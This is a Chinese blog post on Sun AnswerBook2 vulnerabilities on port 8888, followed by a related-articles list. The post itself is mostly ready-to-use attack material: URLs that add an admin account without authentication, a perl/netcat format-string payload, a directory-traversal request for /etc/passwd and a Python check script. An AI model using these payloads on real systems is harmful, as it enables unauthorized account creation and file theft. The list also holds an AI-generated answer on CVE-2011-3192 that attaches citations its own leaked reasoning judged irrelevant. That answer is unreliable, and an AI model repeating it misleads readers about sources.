Sun-AnswerBook 8888 端口

于 2022-09-17 08:10:37 发布
阅读量1.4k 收藏
点赞数 1
分类专栏: nday 文章标签: 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42792266/article/details/126900595
版权

一、未授权管理脚本访问漏洞:

1、受影响版本:

Sun-AnswerBook2 1.2-1.4.2

2、攻击测试手段

http://a.b.c.d:8888/ab2/@AdminViewError#访问错误日志

http://a.b.c.d:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar#添加账户(密码)

二、远程格式化字符串漏洞

1、受影响版本:

Sun-AnswerBook2 1.2-1.4.2

2、攻击测试手段:

 perl -e 'print"GET /";print"%x"x20;print" HTTP/1.0\r\n\r\n\r\n"' | nc localhost 8888 
1.
应该可以看到如下报错:

http-8888 [23/Sep/2000:13:09:37 -0700] warning: send-file reports: The 
requested object "/usr/lib/ab2/data/docs/0fea19f580073656e642d66696c6520 
7265706f7274733a2054686520726571756573746564206f626a65637420222f7573722f6 
c69622f6162322f646174612f646f63732f" could not be opened! 

三、任意文件读取(有些HTTP-Proxy也有这个漏洞):

直接连接connect漏洞主机的对应的端口()

发送Payload
GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n

就可以得到对应的文件内容


参考巡风的POC:


  def check(ip, port, timeout):
     try:
          socket.setdefaulttimeout(timeout)
         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          s.connect((ip, int(port)))
         flag = "GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n"
          s.send(flag)
         data = s.recv(1024)
          s.close()
          if 'root:' in data and 'nobody:' in data:
              return u"漏洞"
      except:
          pass
 

Sun公司的产品AnswerBook存在多种漏洞
weixin_30271335的博客
12-22 3233
一、未授权管理脚本访问漏洞: 1、受影响版本: Sun-AnswerBook2 1.2-1.4.2 2、攻击测试手段 http://a.b.c.d:8888/ab2/@AdminViewError#访问错误日志 http://a.b.c.d:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar#...
vulstrack——第一周
qq_45920291的博客
09-18 295
地址为:http://10.203.87.107/ 最先扫描了端口信息 PORT service 21/tcp ftp 22/tcp ssh 80/tcp http 111/tcp rpcbind 888/tcp accessbuilder 3306/tcp mysql 8888/tcp sun-answerbook宝塔面板 可以看到是thinkphp V5版本 查看http://10.203.87.107/robots.txt 根据版本,搜索了ThinkPHP
漏洞利用——Sun-AnswerBook
技术超强的网络安全平台
12-08 9226
AnswerBook简介 AnswerBook2 产品是 Sun 在线文档系统。它是一个基于客户服务器的系统,客户是任何一个 HTML 3.2-compliant 网络浏览器,而服务器是一个基于 httpd 的网络服务器。您可以在一个中央文档服务器或本地服务器上安装 AnswerBook2 文档集合。 AnswerBoo...
AnswerBook2(端口8888)相关漏洞
per_se_veran_ce的博客
11-12 5306
AnswerBook简介 AnswerBook2 产品是 Sun 在线文档系统。它是一个基于客户服务器的系统,客户是任何一个 HTML 3.2-compliant 网络浏览器,而服务器是一个基于 httpd 的网络服务器。您可以在一个中央文档服务器或本地服务器上安装 AnswerBook2 文档集合。 AnswerBook2 管理特性 1、用客户服务器结构,您能将文档存储于一个单一位置(服务器)而从用户桌面(客户)访问。 2、提供命令行接口(ab2admin)和一个基于浏览器的界面(AnswerBoo
SUN工程师问题经验荟萃
suncxy
01-12 479
1.1 用户忘记root口令,如何解决? 3 1.2 使用ftp时无法以root用户登录系统 3 1.3 使用telnet时无法用root用户登录系统 3 1.4 工作站异常关机后不能正常进入操作系统怎么办? 3 1.5 如何安全的关闭工作站? 4 1.6 如何修改Sun工作站的主机名? 4 1.7 新装一台机器,图形界面起不来,显卡为XVR-100。 4 1.8 如何更改显示器分辨率 4 1.9...
玄魂培训第一期ctf题实战
f1gure的博客
04-29 1959
IP:10.9.0.201 先上nmap:PORT  STATE SERVICE22/tcp  open   ssh3306/tcp  open mysql7777/tcp  open cbt8888/tcp  open sun-answerbookMAC Address: 00:FF:18:CA:FB:2E (Unknown)Device type: bridge|general purpose...
某工商大学服务器端口扫描
时光途径
03-13 4083
3128/tcp open squid-http 3168/tcp open poweronnud 3211/tcp open avsecuremgmt 3221/tcp open xnm-clear-text 3260/tcp open iscsi 3261/tcp open winshadow 3268/tcp open globalcatLDAP 3269/tc...
Python+Go实现端口扫描方案!
爬遍所有网站
07-17 550
近期由于公司存在环境整改/迭代以及历史弱口令等状况,运维同事将内网测试环境的一些SSH等敏感端口对外,导致被挖矿团伙利用进行挖矿,虽然生产环境存在物理隔离,但仍存在极大安全风险,对此需要对所有域名/IP进行对外开放端口监控。 0x01 确定方案 通过网上调研,发现滴滴安全应急响应中心发过一个相关的文章 需求基本一致,使用了下文章中提到的代码进行测试,可能我环境/带宽/目标等多种因素,导致测试之后发现效果并不理想,扫描速度慢且有时不稳定。 经过github、sourceforge、stackove
nmap识别TCP端口服务的数据库
giantbranch的专栏
11-30 2万+
下面的结果是通过伪造了全端口开放的结果后,nmap扫描得到的数据,已经把unknown的都过滤了 TCP PORT SERVICE 1/tcp tcpmux 2/tcp compressnet 3/tcp compressnet 7/tcp echo 9/tcp discard 11/tcp systat 13/tcp daytime 17/tcp qotd 19/tcp chargen 20/t...
nmap常用命令
qq_44969004的博客
04-25 745
1.使用主机名扫描: [root@server1 ~]# nmap server2.tecmint.com Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 15:42 EST Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1674 closed ports PORT STATE SERVICE 22/tcp open
nmap扫描29方法
FireHell的专栏
11-16 1341
我将用两个不同的部分来涵盖大部分NMAP的使用方法,这是nmap关键的第一部分。在下面的设置中,我使用两台已关闭防火墙的服务器来测试Nmap命令的工作情况。 192.168.0.100 – server1.tecmint.com 192.168.0.101 – server2.tecmint.com  NMAP命令用法 # nmap [Scan Type(s)] [Options] {t
Nmap命令的29个实用范例
yaohong
10-21 279

 Nmap即网络映射器对Linux系统/网络管理员来说是一个开源且非常通用的工具。Nmap用于在远程机器上探测网络,执行安全扫描,网络审计和搜寻开放端口。它会扫描远程在线主机,该主机的操作系统,包过滤器和开放的端口。
 我将用两个不同的部分来涵盖大部分NMAP的使用方法,这是nmap关键的第一部分。在下面的设置中,我使用两台已关闭防火墙的服务器来测试Nmap...
services端口列表(from Nmap)
热门推荐
凌云霄天翔
08-04 3万+
# This list of services is from the# Nmap security scanner ( http://www.insecure.org/nmap/ )## For a HUGE list of services (including these and others), # see http://www.graffiti.com/services
Sun发现并修复两个“高度危险”级Java漏洞
java专栏
05-25 550
google_ad_client = "pub-8800625213955058";/* 336x280, 创建于 07-11-21 */google_ad_slot = "0989131976";google_ad_width = 336;google_ad_height = 280;//<script type="text/java
Linux 网络管理员福利:Namp命令的29个实战例子
来自幻想
01-17 1万+
来自Vic___:http://blog.csdn.net/vic___ Nmap 又叫做Network Mapper(网络映射器)是一个开源并且为了Linux系统管理员或者网络管理员的万能的工具。Nmap用于浏览网络,执行安全扫描,网络审计以及在远程机器找到开放端口。它可以扫描在线主机,操作系统,滤包器和远程主机打开的端口。  Nmap 命令和例子 我用两个不同
nmap命令-----高级用法
lvwuwei的博客
05-03 1347
探测主机存活常用方式 (1)-sP :进行ping扫描 打印出对ping扫描做出响应的主机,不做进一步测试(如端口扫描或者操作系统探测): 下面去扫描10.0.3.0/24这个网段的的主机 nmap -sP 10.0.3.0/24 这个命令可以用于探测局域网有哪些机器 [root@B ~]# nmap -sP 10.0.3.0/24 Starting Nmap 5.51 ( http://nmap...
记一个TCP通信问题的排查
weixin_34050389的博客
02-28 306
2019独角兽企业重金招聘Python工程师标准>>> ...
端口号扫描工具---nmap
chunlovenan的专栏
10-23 7822
Nmap(Network Mapper)是一款开放源代码的网络探测和安全审核工具。它用于快速扫描一个网络和一台主机开放的端口,还能使用TCP/IP协议栈特征探测远程主机的操作系统类型。nmap支持很多扫描技术,例如:UDP、TCP connect()、TCP SYN(半开扫描)、ftp代理(bounce攻击)、反向标志、ICMP、FIN、ACK扫描、圣诞树(Xmas Tree)、SYN扫描和nul
| http-vuln-cve2011-3192: | VULNERABLE: | Apache byterange filter DoS | State: VULNERABLE | IDs: BID:49303 CVE:CVE-2011-3192 | The Apache web server is vulnerable to a denial of service attack when numerous | overlapping byte ranges are requested. | Disclosure date: 2011-08-19 | References: | https://www.tenable.com/plugins/nessus/55976 | https://www.securityfocus.com/bid/49303 | https://seclists.org/fulldisclosure/2011/Aug/175 |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192 |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. 888/tcp open accessbuilder 8888/tcp open sun-answerbook
最新发布
03-30
<think>嗯,用户想了解CVE-2011-3192漏洞的详情以及Apache服务器的相关安全问题。首先,我需要先回忆一下这个漏洞的具体情况。CVE-2011-3192是Apache HTTP服务器的一个拒绝服务漏洞,涉及byterange过滤模块。攻击者可以通过发送特制的HTTP请求头,导致服务器消耗大量内存和CPU资源,进而引发服务中断。 接下来,我需要确认漏洞影响的版本范围。根据记忆,这个漏洞影响Apache 2.2.x版本,具体是2.2.19之前的版本。用户可能需要知道如何检查自己的Apache版本是否受影响,以及具体的修复方法。Apache官方应该已经发布了补丁,升级到2.2.20或更高版本可以解决这个问题。此外,可能有临时缓解措施,比如修改配置禁用byte-range特性,或者使用mod_headers模块来过滤恶意请求。 然后,用户还提到想了解相关的Apache安全问题。除了这个特定的CVE,我应该想到其他常见的Apache漏洞,比如CVE-2017-9798(Optionsbleed)、CVE-2019-0211(本地提权)等。需要简要说明每个漏洞的影响和解决方案,以提供全面的信息。 还要注意引用提供的资料。用户给出的引用[1]是关于Verizon数据泄露的,可能与当前问题关联不大,但引用[2]提到S-TAP的优化参数,可能与服务器性能或安全配置有关,但不确定是否直接相关。可能需要忽略这些引用,除非能找到关联点,但当前问题主要围绕Apache漏洞,所以可能不需要直接引用它们。 用户可能需要知道如何检测自己的服务器是否存在这个漏洞,比如查看版本号,或者使用漏洞扫描工具。另外,解释漏洞的技术细节时,要确保用中文清晰表达,比如HTTP请求中的Range头如何被滥用,导致内存分配问题。 最后,生成相关问题时要考虑用户可能的后续疑问,比如如何升级Apache、如何配置mod_headers、其他相关CVE等。确保问题覆盖漏洞分析、修复步骤、相关安全问题及最佳实践。</think>### CVE-2011-3192 Apache byterange filter DoS漏洞详解 #### 漏洞概述 CVE-2011-3192是Apache HTTP Server 2.2.x版本中的一个高危拒绝服务(DoS)漏洞,涉及`mod_headers`和`mod_setenvif`模块处理`Range`请求头的方式。攻击者通过发送包含大量重叠字节范围(byte-range)的HTTP请求头,可导致服务器内存耗尽或CPU资源过载,最终使服务不可用[^1]。 #### 技术原理 1. **触发条件**:当HTTP请求头包含类似`Range: bytes=0-1, 0-2, 0-3,...,0-N`的恶意构造时 2. **漏洞根源**:Apache的byterange过滤器未正确处理此类请求,导致内存分配呈$O(n^2)$复杂度增长 3. **影响范围**:Apache 2.2.0至2.2.19版本,且未安装官方补丁的系统 数学表达示例: 对于包含$k$个重叠范围的请求,服务器需处理$\frac{k(k+1)}{2}$次内存分配操作,最终导致资源耗尽。 #### 修复方案 1. **官方补丁** 升级至Apache 2.2.20+版本,该版本引入`Range`头解析限制: ```apache # httpd.conf 配置示例 SetEnvIf Range (,.*?){5,} bad-range=1 RequestHeader unset Range env=bad-range ``` 2. **临时缓解措施** ```apache # 禁用byte-range特性 RequestHeader unset Range # 或限制请求头长度 LimitRequestFieldSize 8190 ``` 3. **第三方防护**:使用Web应用防火墙(WAF)过滤异常`Range`头,参考S-TAP等安全产品的缓冲优化方案[^2] #### Apache相关安全问题扩展 1. **CVE-2017-9798 (Optionsbleed)** - 漏洞类型:信息泄露 - 影响模块:`mod_allowmethods` - 修复方式:升级至2.2.34+/2.4.27+ 2. **CVE-2019-0211 (本地提权)** - 漏洞类型:权限提升 - 影响版本:Apache 2.4.17-2.4.38 - 修复方案:更新至2.4.39+并限制`mod_prefork`配置
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值